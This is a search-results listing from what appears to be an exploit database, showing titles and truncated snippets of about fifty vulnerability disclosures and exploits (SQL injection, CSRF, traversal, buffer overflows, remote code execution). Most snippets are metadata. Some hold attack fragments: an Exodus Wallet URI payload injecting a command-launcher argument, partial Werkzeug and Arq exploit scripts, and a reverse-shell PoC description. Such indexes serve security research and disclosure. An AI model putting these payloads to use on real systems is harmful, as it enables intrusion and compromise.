41207 matches found
Oracle Hospitality Simphony (MICROS) 2.7 2.9 - Directory Traversal
Oracle Hospitality Simphony MICROS 2.7 2.9 - Directory Traversal Exploit Title: Oracle Hospitality Simphony MICROS directory traversal Date: 30.01.2018 Exploit Author: Dmitry Chastuhin https://twitter.com/chipik Vendor Homepage: http://www.oracle.com/ Version: 2.7, 2.8 and 2.9 Tested on: Win, nix...
Geovision Inc. IP CameraVideoAccess Control - Multiple Remote Command Execution Stack Overflow Double Free Unauthorized Access
Geovision Inc. IP CameraVideoAccess Control - Multiple Remote Command Execution Stack Overflow Double Free Unauthorized Access STX Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access Attack vector:...
WebKit - detachWrapper Use-After-Free
WebKit - detachWrapper Use-After-Free ::detachWrapper /Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:...
WebKit - WebCore::FrameView::clientToLayoutViewportPoint Use-After-Free
WebKit - WebCore::FrameView::clientToLayoutViewportPoint Use-After-Free function jsfuzzer var b = document.createElement"body"; a.appendb; ta.autofocus = true; var iframe = document.createElement"iframe"; b.appendChildiframe; li.appendChilddd; iframe.contentDocument.caretRangeFromPoint; function...
Geovision Inc. IP Camera Video - Remote Command Execution
Geovision Inc. IP Camera Video - Remote Command Execution !/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all...
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow SEH Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link:...
System Shield 5.0.0.136 - Privilege Escalation
System Shield 5.0.0.136 - Privilege Escalation / Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 ...
HPE iMC 7.3 - RMI Java Deserialization
HPE iMC 7.3 - RMI Java Deserialization Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability Date: 01-28-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...
Advantech WebAccess 8.3 - SQL Injection
Advantech WebAccess 8.3 - SQL Injection !/usr/bin/python2.7 Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability Date: 01-13-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
Joomla! Component Visual Calendar 3.1.3 - id SQL Injection
Joomla! Component Visual Calendar 3.1.3 - id SQL Injection Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link:...
BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure
BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure Exploit Title: BMC BladeLogic RSCD agent get Windows users Filename: BMCwinUsers.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-27 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog...
Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link:...
Hotspot Shield - Information Disclosure
Hotspot Shield - Information Disclosure Vulnerability Summary The following advisory describes an information disclosure found in Hotspot Shield. Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming,...
LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow
LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow !/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link:...
Joomla! Component CP Event Calendar 3.0.1 - id SQL Injection
Joomla! Component CP Event Calendar 3.0.1 - id SQL Injection Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link:...
macOS - sysctl_vfs_generic_conf Stack Leak Through Struct Padding
macOS - sysctl_vfs_generic_conf Stack Leak Through Struct Padding / The sysctls vfs.generic.conf. are handled by sysctl_vfs_generic_conf, which is implemented as follows: static int sysctl_vfs_generic_conf SYSCTLHANDLERARGS int name, namelen; struct vfstable vfsp; struct vfsconf vfsc; voidoidp; name = arg...
iBall WRA150N - Multiple Vulnerabilities
iBall WRA150N - Multiple Vulnerabilities Vulnerabilities summary The following advisory describes two (2) vulnerabilities found in iB-WRA150N devices, firmware 1.2.6 build 110401 Rel.47776n. iB-WRA150N is “a powerful solution to Internet connectivity at home, small offices and work stations. The ke...
Arq 5.10 - Local Privilege Escalation (1)
Arq 5.10 - Local Privilege Escalation 1 !/usr/bin/env ruby Arq USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT USER'S CRONTAB! $binarytarget = "/tmp/arq510exp" class Arq510...
Arq 5.10 - Local Privilege Escalation (2)
Arq 5.10 - Local Privilege Escalation 2 !/bin/bash Arq payload.sh EOF !/bin/bash rm -rf $HOME/.arq510privescexp while : do pid=\ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \ |cut -d ' ' -f2\ if "$pid" != "" ; then kill -9 $pid...
systemd (systemd-tmpfiles) 236 - fs.protected_hardlinks0 Local Privilege Escalation
systemd systemd-tmpfiles 236 - fs.protected_hardlinks0 Local Privilege Escalation Product: systemd systemd-tmpfiles Versions-affected: 236 and earlier Author: Michael Orlitzky Fixed-in: commit 5579f85 , version 237 Bug-report: https://github.com/systemd/systemd/issues/7736 Acknowledgments: Lennart...
Artifex MuJS 1.0.2 - Integer Overflow
Artifex MuJS 1.0.2 - Integer Overflow Exploit Title: DoS caused by the interactive call between two functions Date: 2018-01-16 Exploit Author: Andrea Sindoni - @invictus1306 Vendor: Artifex https://www.artifex.com/ Software Link: https://github.com/ccxvii/mujs Version: Mujs -...
Artifex MuJS 1.0.2 - Denial of Service
Artifex MuJS 1.0.2 - Denial of Service Hello, I want to submit the following bug: The jsstrtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an integer overflow because of incorrect exponent validation. Exploit Title: Integer signedness error leading to Out-of-bounds read that causes cra...
Trend Micro Threat Discovery Appliance 2.6.1062r1 - dlp_policy_upload.cgi Remote Code Execution
Trend Micro Threat Discovery Appliance 2.6.1062r1 - dlp_policy_upload.cgi Remote Code Execution !/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get...
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal / Local File Inclusion Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone...
Task Rabbit Clone 1.0 - id SQL Injection
Task Rabbit Clone 1.0 - id SQL Injection Exploit Title: Task Rabbit Clone 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://migrateshop.com/ Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/ Version: 1.0 Category: Webapps Tested on:...
Hot Scripts Clone - subctid SQL Injection
Hot Scripts Clone - subctid SQL Injection Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified...
Netis WF2419 Router - Cross-Site Request Forgery
Netis WF2419 Router - Cross-Site Request Forgery Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery CSRF Date: 28/01/2018 Exploit Author: Sajibe Kanti Author Contact: https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419, V2.2.36123...
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php...
Multilanguage Real Estate MLM Script 3.0 - srch SQL Injection
Multilanguage Real Estate MLM Script 3.0 - srch SQL Injection Exploit Title: Multilanguage Real Estate MLM Script = 3.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link:...
Gnew 2018.1 - Cross-Site Request Forgery
Gnew 2018.1 - Cross-Site Request Forgery Exploit Title: Gnew 2018.1 - Cross-Site Request Forgery Date: 26/01/2018 Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT Vendor website : http://gnew.xyz/ Software download : http://www.gnew.xyz/pages/download.php Version: 2018.1 Tested on: Windows 10 Hom...
Nexpose 6.4.66 - Cross-Site Request Forgery
Nexpose 6.4.66 - Cross-Site Request Forgery Exploit Title: Cross Site Request Forgery at Nexpose Automated Actions Release Date: 2017-12-13 Exploit Author: Shwetabh Vishnoi Link: https://www.linkedin.com/in/shwetabhvishnoi Vendor Homepage: https://www.rapid7.com/ Software Link:...
Buddy Zone 2.9.9 - SQL Injection
Buddy Zone 2.9.9 - SQL Injection Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://vastal.com/ Software Link: http://vastal.com/buddy-zone-social-networking-script.html Version: 2.9.9 Category: Webapps Tested on:...
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery CODE input...
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Dork: N/A Date: 27.01.2018 Vendor Homepage: https://joomlatag.com/ Software Link:...
Sony Playstation 3 (PS3) 4.82 - Jailbreak (ROP)
Sony Playstation 3 PS3 4.82 - Jailbreak ROP EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in...
TSiteBuilder 1.0 - SQL Injection
TSiteBuilder 1.0 - SQL Injection Exploit Title: TSiteBuilder 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.datacomponents.net/ Software Link: http://www.datacomponents.net/products/website/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploi...
KeystoneJS 4.0.0-beta.7 - Cross-Site Request Forgery
KeystoneJS 4.0.0-beta.7 - Cross-Site Request Forgery Exploit Title: Application wide CSRF Bypass Date: Sep, 2017 Exploit Author: Saurabh Banawar Vendor Homepage: http://keystonejs.com/ Software Link: https://github.com/keystonejs/keystone Version: 4.0.0 Tested on: Windows 8.1 CVE : 2017-16570 Lin...
Werkzeug - Debug Shell Command Execution
Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...
BMC BladeLogic 8.3.00.64 - Remote Command Execution
BMC BladeLogic 8.3.00.64 - Remote Command Execution Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version Filename: BMCrexec.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-24 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog...
WordPress Plugin Learning Management System - course_id SQL Injection
WordPress Plugin Learning Management System - course_id SQL Injection Exploit Title: Good LMS - Learning Management System WP Plugin SQL Injection Date: 2018-01-24 Exploit Author: Esecurity.ir Exploit Author Web Site: http://esecurity.ir Special Thanks : Meisam Monsef [email protected] - Telegra...
Dodocool DC38 N300 - Cross-site Request Forgery
Dodocool DC38 N300 - Cross-site Request Forgery Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery Date: 17-01-2018 Exploit Authors: Raffaele Sabato Contact: https://twitter.com/syrion89 Vendor: DODOCOOL Vendor Homepage: www.dodocool.com Version: RTN2-AW.GD.R3465.1.20161103 CVE:...
Exodus Wallet (ElectronJS Framework) - Remote Code Execution
Exodus Wallet ElectronJS Framework - Remote Code Execution window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password
ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password import requests import sys import urllib3 ip = sys.argv1 user = sys.argv2 newPassword = sys.argv3 requests.packages.urilib3.disablewarnings urllib3.disablewarningsurllib3.exceptions.InsecureRequestWarning data = "groupid": '',...
WordPress Plugin Email Subscribers Newsletters 3.4.7 - Information Disclosure
WordPress Plugin Email Subscribers Newsletters 3.4.7 - Information Disclosure Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure Google Dork: Date: 2018-01-23 Exploit Author: ThreatPress Security Vendor Homepage: http://icegram.com/ Software Link:...
Oracle VirtualBox 5.1.30 5.2-rc1 - Guest to Host Escape
Oracle VirtualBox 5.1.30 5.2-rc1 - Guest to Host Escape SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities Source: https://blogs.securiteam.com/index.php/archives/3649 Vulnerabilities summary The following advisory describes two (2) guest to host escape found in Oracle...
Professional Local Directory Script 1.0 - SQL Injection
Professional Local Directory Script 1.0 - SQL Injection Exploit Title: Professional Local Directory Script 1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://www.eihitech.com/ Software Link: http://www.eihitech.com/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
RAVPower 2.000.056 - Root Remote Code Execution
RAVPower 2.000.056 - Root Remote Code Execution """ Exploit Title: RAVPower - remote root Date: 23/01/2018 Exploit Authors: Daniele Linguaglossa Vendor Homepage: https://www.ravpower.com/ Software Link: https://www.ravpower.com/ Version: 2.000.056 Tested on: OSX CVE : CVE-2018-5997 """ import...
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload Exploit Title: Telerik UI for ASP.NET AJAX RadAsyncUpload uploader Filename: RAUcrypto.py Github: https://github.com/bao7uo/RAUcrypto Date: 2018-01-23 Exploit Author: Paul Taylor / Foregenix Ltd Website:...
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker Filename: dpcrypto.py Github: https://github.com/bao7uo/dpcrypto Date: 2018-01-23 Exploit Author: Paul Taylor / Foregenix Ltd Website:...
Wchat 1.5 - SQL Injection
Wchat 1.5 - SQL Injection Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319 Version: 1.5 Category: Webapps Tested...